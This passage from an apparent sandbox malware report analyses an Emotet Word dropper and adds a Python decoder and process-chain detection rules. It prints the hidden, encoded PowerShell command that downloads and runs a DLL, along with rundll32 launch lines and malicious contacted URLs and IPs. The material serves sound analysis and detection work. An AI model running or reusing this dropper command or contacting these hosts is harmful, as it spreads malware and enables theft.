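                 expr)
    src = fold_strings(apply_replaces(fold_strings(src)))
    if src.lstrip().startswith("$"):              # assignment: keep only the right-hand side
        src = src.split("=", 1)[1]
    m = re.fullmatch(r"\s*\(?\s*'([^']*)'\s*\)?\s*", src)
    return m.group(1) if m else src


if __name__ == "__main__":
    print(decode_encoded_command(ENCOD_PREFIX))
    print(resolved_type_names(TYPE_STMTS))
    print(resolve_expression(DIR_STMT, VARIABLES))
    print(resolve_expression(DLL_STMT, VARIABLES))
```

The recovered directory (C:\Users\user\Bqpeen6\Bbs5w_e\) and DLL path (C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll) match the rundll32.exe command line the report records later in this section, which is the check that the static fold is faithful; the two type names resolve to System.IO.Directory (used to create that directory) and System.Net.ServicePointManager (used to force TLS 1.2 before the WebClient download). The $Ck81xx2 fragments in the decoded script assemble the download list with "@" between entries and a "J)(3s2)(" token in place of the path separator; the statement that maps that token back is cut off in the report, so the example does not reconstruct the URLs.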
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ocet\gyzufj.pjr',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mylz\dnoauh.fda',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Skqv\bpgr.lft',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rmmi\fgaafkb.bqv',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeay\tsbyty.hpi',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jfjk\etjwcl.eoy',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cyjj\rnycqfi.rmc',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fpxy\zbyjv.xxd',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xcmo\muvihv.sjs',RunDLL
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
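The process tree this section records is what a detection should key on rather than the file hash: cmd.exe launching msg.exe and a mixed-case PowerShell with an abbreviated -ENCOD switch, PowerShell launching rundll32.exe on a DLL under the user profile by ordinal (#1), and rundll32.exe re-launching itself on a file with a non-.dll extension in a fresh SysWOW64 subdirectory through the RunDLL export. The Python below is an added example, not part of the Joe Sandbox report: it runs three such rules over constructed process-creation events whose three malicious command lines are copied from this section (the -ENCOD payload shortened), plus two benign controls invented as negatives. The event shape (parent, image, cmdline) is Sysmon-like but simplified, and the rule names are the example's own.

```python
r"""Detection logic for the process chain this report records.

Added example, not part of the sandbox report. The three malicious command
lines below are copied from the report (the -ENCOD payload shortened); the
two benign events are constructed controls. Rule names and the event shape
are the example's choices, not Joe Sandbox's.
"""
import re

EVENTS = [
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "POwersheLL -w hidden -ENCOD "
                "IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1"},
    {"parent": r"C:\Windows\SysWOW64\rundll32.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ocet\gyzufj.pjr',RunDLL"},
    {"parent": r"C:\Windows\explorer.exe",                      # constructed benign control
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"parent": r"C:\Windows\System32\cmd.exe",                  # constructed benign control
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
NORMAL_CASE = {"powershell", "Powershell", "PowerShell", "POWERSHELL"}
# A DLL under a user profile invoked by ordinal (#1) instead of an export name.
USER_DLL_ORDINAL = re.compile(r"(?i)\\users\\[^\\\s]+\\\S+\.dll\s+#\d+")
# A module in a subdirectory of System32/SysWOW64 whose extension is not .dll,
# loaded through an export named RunDLL.
SYSDIR_NON_DLL = re.compile(
    r"(?i)\\windows\\sys(?:tem32|wow64)\\[^\\\s']+\\[^\\\s']+\.(?!dll\b)[a-z0-9]+'?\s*,\s*rundll\b")


def powershell_rules(ev):
    hits = []
    toks = ev["cmdline"].split()
    exe = re.sub(r"(?i)\.exe$", "", toks[0].strip("'\"").rsplit("\\", 1)[-1])
    if exe.lower() == "powershell" and exe not in NORMAL_CASE:
        hits.append("powershell_case_anomaly")          # e.g. POwersheLL
    for i, tok in enumerate(toks[:-1]):
        # powershell.exe accepts -ec and any unambiguous prefix of -EncodedCommand
        # (-e, -enc, -ENCOD ...), so match on the prefix plus a base64-looking blob.
        switch = tok.lower()
        is_enc = switch == "-ec" or (len(switch) > 1 and "-encodedcommand".startswith(switch))
        if tok.startswith("-") and is_enc and B64_BLOB.match(toks[i + 1]):
            hits.append("powershell_encoded_command")
            break
    return hits


def rundll32_rules(ev):
    hits = []
    if USER_DLL_ORDINAL.search(ev["cmdline"]):
        hits.append("rundll32_userprofile_dll_ordinal_export")
    if SYSDIR_NON_DLL.search(ev["cmdline"]) and ev["parent"].lower().endswith("rundll32.exe"):
        hits.append("rundll32_spawns_rundll32_non_dll_module")
    return hits


def evaluate(events):
    """Return (event index, rule name) pairs for every rule that fires."""
    findings = []
    for i, ev in enumerate(events):
        image = ev["image"].lower()
        if image.endswith("powershell.exe"):
            rules = powershell_rules(ev)
        elif image.endswith("rundll32.exe"):
            rules = rundll32_rules(ev)
        else:
            rules = []
        findings.extend((i, r) for r in rules)
    return findings


if __name__ == "__main__":
    for idx, rule in evaluate(EVENTS):
        print(idx, rule, EVENTS[idx]["cmdline"][:80])
```

The first rule pair is the same signal the report calls "PowerShell case anomaly" and "Suspicious Encoded PowerShell Command Line"; the rundll32 rules cover the two hops that follow. Neither rundll32 rule depends on the random directory and file names, which change per infection, only on where the module lives, what it is called, and which process started it.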

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 7_2_10010000
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 7_2_10011C13
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement, 7_2_1001106A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 7_2_10011874
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 7_2_10011C7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 7_2_10011CB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 7_2_1001190C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 7_2_10011980
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW, 7_2_10013DAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 7_2_10014DB7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA, 7_2_10013DE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 7_2_100109FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 7_2_10009A59
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement, 7_2_100112C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 7_2_10014F07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 7_2_10013F22
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 7_2_1000C727
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 7_2_10011B52
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 7_2_1001175D
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation (5 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E372 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 7_2_1000E372
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 0000000B.00000002.2104461658.0000000000251000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2097868806.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2102162180.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2100838145.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2104434238.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2107224679.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2109356030.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2097792177.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2102227386.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2346608733.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2105642639.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2107394819.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2105597676.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2110979114.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2109268872.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2346635029.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2099576537.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2100056068.0000000000701000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2100874845.00000000001A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2111023949.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 14.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Behavior Graph ID: 336961 Sample: Informacion_4-09757.doc Startdate: 07/01/2021 Architecture: WINDOWS Score: 100

Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 12 other signatures

Process tree (graph rendering removed; the figures after a process name are the node counters shown in the graph):

WINWORD.EXE (436, 28) started
cmd.exe started
  Signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found; PowerShell case anomaly found
  -> powershell.exe (12, 9) started
     Signature: Powershell drops PE file
     Network: paulscomputing.com 216.218.207.98, ports 49167, 80, CENTRALUTAHUS, United States
     Dropped file: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll, PE32
     -> rundll32.exe started
        -> rundll32.exe (2) started; Hides that the sample has been downloaded from the Internet (zone.identifier)
           -> rundll32.exe (1) started; Hides that the sample has been downloaded from the Internet (zone.identifier)
              -> rundll32.exe (1) started; Hides that the sample has been downloaded from the Internet (zone.identifier)
                 -> rundll32.exe (1) started; Hides that the sample has been downloaded from the Internet (zone.identifier)
                    -> rundll32.exe (1) started; Hides that the sample has been downloaded from the Internet (zone.identifier)
                       -> rundll32.exe (1) started; Hides that the sample has been downloaded from the Internet (zone.identifier)
                          -> rundll32.exe started; Hides that the sample has been downloaded from the Internet (zone.identifier)
  -> msg.exe started

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
167.71.148.58 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
216.218.207.98 | unknown | United States | 36103 | CENTRALUTAHUS | true
202.187.222.40 | unknown | Malaysia | 9930 | TTNET-MYTIMEdotComBerhadMY | true
184.66.18.83 | unknown | Canada | 6327 | SHAWCA | true

Contacted Domains

Name | IP | Active
paulscomputing.com | 216.218.207.98 | true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://paulscomputing.com/CraigsMagicSquare/H/ | true | Avira URL Cloud: malware | unknown
https://167.71.148.58:443/ta2men4jqfnerm/ | true | Avira URL Cloud: safe | unknown